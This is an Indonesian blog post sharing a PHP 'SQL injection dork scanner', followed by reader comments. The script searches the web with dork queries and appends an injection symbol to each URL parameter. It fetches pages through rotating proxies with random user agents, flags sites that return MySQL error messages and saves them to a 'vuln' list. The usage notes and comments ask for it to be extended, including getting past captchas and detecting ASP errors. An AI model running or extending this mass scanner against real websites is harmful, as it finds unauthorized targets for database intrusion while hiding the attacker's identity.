Simple Sqli Dork Scanner

Mei 28, 2013
5 komentar
Labels: , ,

ijin share dork scan punya ane
mohon dikembangkan lagi gan

proxy==true){
   curl_setopt($ch, CURLOPT_HTTPPROXYTUNNEL, false);
   curl_setopt($ch, CURLOPT_PROXY, $this->proxy());
  }
        curl_setopt($ch, CURLOPT_USERAGENT, array_rand($this->useragent));
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_AUTOREFERER, true );
        curl_setopt($ch, CURLOPT_TIMEOUT, 15);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 15);
        $exec = curl_exec($ch);
        curl_close($ch);
        return $exec;
    }
 function proxy(){
  if(@is_file($this->proxy_file)){
   $file = file($this->proxy_file);
   return str_replace(array("\n", "\r", "\r\n"), "", $file[array_rand($file)]);
  }else return "tidak ada file {$this->proxy_file}, tolong buat dulu";
 }
    function parse($url){
        $this->key = str_replace(array("\n", "\r", "\r\n"), "", $this->key);
        $arr = parse_url($url);
        if(empty($arr['query'])){
            return $url;
        }    
        parse_str($arr['query'], $ar);
        $key = array_keys($ar);
        foreach($key as $a){
            $x[] = $a."=".$ar[$a].$this->key;
            }
        $imp = implode("&", $x);
        return $arr['scheme']."://".$arr['host'].$arr['path']."?".$imp;
    }
    function simpan($url){
        $fp = fopen($this->simpan, "a");
        fwrite($fp, $url."\n");
        fclose($fp);
    }
 function cekurls($urls){
  $urlv = null;
  if($this->hapus_yg_sama==false) return $urls;
  elseif($this->hapus_yg_sama==true){
   for($a=0; $a$url){
    if(!empty($prm[$key])){
     $prm = "?".$prm[$key];
    }elseif(empty($prm[$key])) $prm = null;
    $urlv[] = $scheme[$key]."://".$url.$path[$key].$prm;
   }
   return $urlv;
   }elseif(!isset($host) && $this->proxy==false) echo "[Error] ";
   elseif(!isset($host) && $this->proxy==true) echo "[Proxy mungkin tidak valid] ";
  }
 }
    function scandork(){
        $dork = $this->dork;
        $dork = str_replace(array("\n", "\r", "\r\n"), "", $dork);
        $start=0;
        $jumlah=0;
        $page=0;
  $total=0;
        while($jumlah<=$this->jumlah){
            $a=0;
            $graph = $this->graph($dork, $start, null);
            $match = $this->match('
parse(urldecode($url));
                $graph = $this->graph(null, null, $urlp);
                if(preg_match("/error in your SQL syntax|mysql_fetch_array\(\)|execute query|mysql_fetch_object\(\)|mysql_num_rows\(\)|mysql_fetch_assoc\(\)|mysql_fetch\?\?_row\(\)|SELECT \* FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i", $graph)){
                    echo "vuln -> ".urldecode($urlp)."\n";
                    $this->simpan($urlp);
                    $a++;
                }else{
                    echo "NOT vuln - > ".urldecode($urlp)."\n";
                }
                $jumlah++;
            }
            $selang = time() - $mulai;
            $detik = round($selang);
            $menit = round($selang / 60);
            $jam = round($selang / 3600);
   $start=$start+count($cekurls);
            $page++;
            echo "Selesai scan page {$page} dalam : {$jam} jam {$menit} menit {$detik} detik\n\n";
        }
        echo "Jumlah situs yang discan {$jumlah}\n";
        
    }
    
}
echo "simple dork scanner by rieqyns13\n\n";
$dc = new rieqyns13;
echo "Masukkan dork = ";
$fp = fopen("php://stdin", "rb"); //dorknya
$str = fgets($fp);
echo "Masukkan simbol/key = "; //simbol yg disisipkan pada url
$key = fgets($fp);
fclose($fp);
///OPTION///////////////////////////////////
$dc->hapus_yg_sama = true; //isi true jika ingin menghapus url yg sama dalam setiap page, false jika tidak
$dc->proxy = true; //true jika ingin menggunakan proxy yg ada di $dc->proxy_file, atau false jika tidak ingin menggunakan proxy
$dc->proxy_file = "proxylist.txt"; //digunakan jika $dc->proxy=true, setiap proxy yg ada di dalam file harus menggunakan susunan -> proxy:port . contoh "914.143.141.131:8080"
$dc->jumlah = 300; //jumlah situs yg discan
////////////////////////////////////////////
$dc->dork = $str;
$dc->key = $key;
$dc->simpan = "url_vuln.txt";
$dc->scandork();
?>
copas ke notepad trus simpan dgn extensi php, trus buka cmd, masuk ke path dmana taruh file php tadi, trus jalanin pke printah php scan.php, dgn syarat path nya harus udah ditambahin/diatur ke c:\xampp\php


dan ini gambar jika menggunakan proxy
tuh berarti proxy yg dipke harus bener2 FRESH dan tahan lama, jika tidak, maka beberapa url atau bahkan semua url tidak bisa digraph.
skarang penjelasan selanjutnya.
tuh konsep dari dork scanner ane,  jika url ada parameter tertentu kya gini misal:
http://site.com/detail.php?id=2&next.asp?cat=21&gay.cfm?id=null
ntar dirubah ke
http://site.com/detail.php?id=2'&next_asp?cat=21'&gay_cfm?id=null'

sesuai dengan simbol yg dimasukkan.
jika url tidak ada parameter kya di atas, akan direturn ke url aslinya
ane cuman bisa nangkep site vuln berdasarkan pesan sql error pda umunya gan, jadi site keluar gak terlalu banyak. ni gan buat ngecek apakah tuh site vuln ato kagak
if(preg_match("/error in your SQL syntax|mysql_fetch_array\(\)|execute query|mysql_fetch_object\(\)|mysql_num_rows\(\)|mysql_fetch_assoc\(\)|mysql_fetch\?\?_row\(\)|SELECT \* FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i", $graph))
pngalam ane klo keseringan pke dork yg kompleks, biasanya diblock ama captcha gan
mohon dikembangin lagi biar bisa menjadi tool yg advanced gan

Share This
Previous article
Contoh Mass Mail dgn SMTP di Localhost
Next article
Algoritma Euclid untuk Menentukan KPK dan FPB
Related Posts
5 komentar
  1. Anonim26 April 2015 pukul 05.19

    bisa kasih tutor yang detil gan, masih bingung nih, udah simpan .php , pas di cmd commandnya gimana?

    BalasHapus
    Balasan
    1. RieqyNS135 Mei 2015 pukul 09.34

      klo udah nginstall xampp, di cmd tulis kya gini:

      c:\xampp\php\php.exe file.php

      Hapus
  2. My Sweet Memories9 Desember 2015 pukul 02.22

    saya save dg nama index.php di c:\xampp\htdocs\

    di cmd saya ketik c:\xampp\htdocs\php.exe index.php

    tidak bisa apa yg salah ya gan

    BalasHapus
    Balasan
    1. RieqyNS139 Desember 2015 pukul 12.39

      error yg muncul apa emang ??
      curl_init() bla bla bla ??

      Hapus
  3. Anonim28 Desember 2016 pukul 01.06

    Hey bro, found you on hf. First of all great work on your simple sqli scanner and happy festive season and sorry to bother you. But it seems that the input captcha is broken probably due to some google update. I am no longer able to view or enter it due to some script error.
    Also for some reason, it is unable to detect vulnerable asp sqli errors even the most obvious ones. Any chance you can update and fix the bugs? Your efforts are really appreciated :) and keep up the great work.

    BalasHapus